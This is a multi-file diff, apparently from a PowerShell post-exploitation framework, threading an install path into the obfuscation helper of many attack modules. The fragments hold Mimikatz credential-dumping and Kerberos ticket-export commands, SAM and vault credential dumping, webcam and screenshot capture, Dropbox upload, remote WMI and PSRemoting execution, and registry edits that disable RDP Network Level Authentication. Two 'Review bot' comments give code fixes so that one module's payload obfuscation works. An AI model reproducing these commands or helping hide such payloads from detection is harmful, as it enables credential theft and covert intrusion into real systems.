@ -107,6 +107,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -79,6 +79,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -216,5 +216,5 @@ Start-WebcamRecorder"""
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -103,6 +103,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -89,6 +89,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -162,5 +162,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -127,5 +127,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -88,6 +88,6 @@ class Module:
scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
scriptEnd += " | fl | Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -114,6 +114,6 @@ class Module:
if no_defaults:
scriptEnd += " -NoDefaults "
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -89,6 +89,6 @@ class Module:
scriptEnd += " -Instance "+instance
scriptEnd += " -Query "+"\'"+query+"\'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -232,6 +232,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -77,6 +77,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -98,6 +98,6 @@ class Module:
if option != "Agent" and option != "ProcessName" and option != "ProcessId":
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -117,6 +117,6 @@ class Module:
scriptEnd += ";'Invoke-NetRipper completed.'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -103,6 +103,6 @@ class Module:
scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -90,5 +90,5 @@ class Module:
if persistent != "":
script += " persistent=yes"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -120,5 +120,5 @@ Invoke-Prompt """
else:
script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -115,5 +115,5 @@ Get-Screenshot"""
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -118,6 +118,6 @@ class Module:
scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -90,6 +90,6 @@ class Module:
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -92,6 +92,6 @@ class Module:
scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger "
scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -151,6 +151,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -54,6 +54,6 @@ class Module:
scriptEnd = "\n%s" %(scriptCmd)
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -124,6 +124,6 @@ class Module:
scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -76,6 +76,6 @@ class Module:
scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -73,6 +73,6 @@ class Module:
# add in the cert dumping command
scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -79,6 +79,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command "
scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -100,6 +100,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -109,6 +109,6 @@ class Module:
scriptEnd += "| Out-String;"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -72,6 +72,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -150,6 +150,6 @@ class Module:
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -78,6 +78,6 @@ class Module:
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -86,6 +86,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -137,6 +137,6 @@ class Module:
scriptEnd += "\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -126,6 +126,6 @@ class Module:
scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -74,6 +74,6 @@ class Module:
# set the purge command
scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -76,6 +76,6 @@ class Module:
scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -162,6 +162,6 @@ class Module:
scriptEnd += " /ptt\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -80,6 +80,6 @@ class Module:
else:
scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -70,6 +70,6 @@ class Module:
scriptEnd = "Invoke-PowerDump"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -136,6 +136,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -155,6 +155,6 @@ class Module:
if self.options['RevToSelf']['Value'].lower() != "true":
scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -73,6 +73,6 @@ class Module:
scriptEnd = "Get-VaultCredential"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -119,6 +119,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -84,7 +84,7 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
function Invoke-DropboxUpload {
@ -137,5 +137,5 @@ Invoke-DropboxUpload """
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
return script
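Review bot: The new `obfuscate=False, obfuscationCommand=""` parameters added to generate() in the first hunk are not used anywhere in the visible hunks — the second hunk returns `script` without the `if obfuscate:` branch every sibling module in this commit has, so a caller that asks for obfuscation silently gets the plain script. Unless the obfuscation call lives in a part of the function not shown, add before the return: `if obfuscate:` / `script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)` / `return script`, which assumes this file already imports helpers (the hunk does not show that). generate()'s body continues between and outside the two hunks.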


@ -110,6 +110,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -95,6 +95,6 @@ class Module:
scriptEnd += " -Cmd " + command
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -193,6 +193,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -131,6 +131,6 @@ class Module:
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -185,6 +185,6 @@ class Module:
scriptEnd += " | Out-String"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -146,6 +146,6 @@ class Module:
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -136,5 +136,5 @@ class Module:
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -132,6 +132,6 @@ class Module:
if password != "":
scriptEnd += " -Password "+password
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -123,6 +123,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -145,5 +145,5 @@ class Module:
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -187,6 +187,6 @@ class Module:
script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -121,6 +121,6 @@ class Module:
scriptEnd += " -Port "+str(self.options['Port']['Value'])
scriptEnd += " -Cmd \"" + launcher + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -162,5 +162,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -55,5 +55,5 @@ class Module:
# command to enable NLA only if the enable runs successfully
script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -100,5 +100,5 @@ class Module:
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -73,6 +73,6 @@ class Module:
scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -57,5 +57,5 @@ class Module:
# command to disable NLA
script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -84,5 +84,5 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
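Review bot: The text appended by `scriptEnd += ' | Out-String | ...'` at the top of this hunk never reaches the returned value — the new line obfuscates and returns `script` (`script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)`), and there is no `script += scriptEnd` between the append and the return, unlike the sibling modules in this commit. Since strings are immutable, even an earlier `script += scriptEnd` outside the hunk would not pick up this later append, so the Out-String/"completed!" suffix is dropped. Add `script += scriptEnd` immediately before the `if obfuscate:` line, or obfuscate and return `scriptEnd` if that is the intended payload. The function body starts outside the hunk.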


@ -90,6 +90,6 @@ class Module:
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -77,5 +77,5 @@ class Module:
script += "%s" %(scriptCmd)
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -87,5 +87,5 @@ Function Invoke-LockWorkStation {
Invoke-LockWorkStation; "Workstation locked."
"""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -62,5 +62,5 @@ class Module:
else:
script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script


@ -110,6 +110,6 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script


@ -87,6 +87,6 @@ class Module:
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
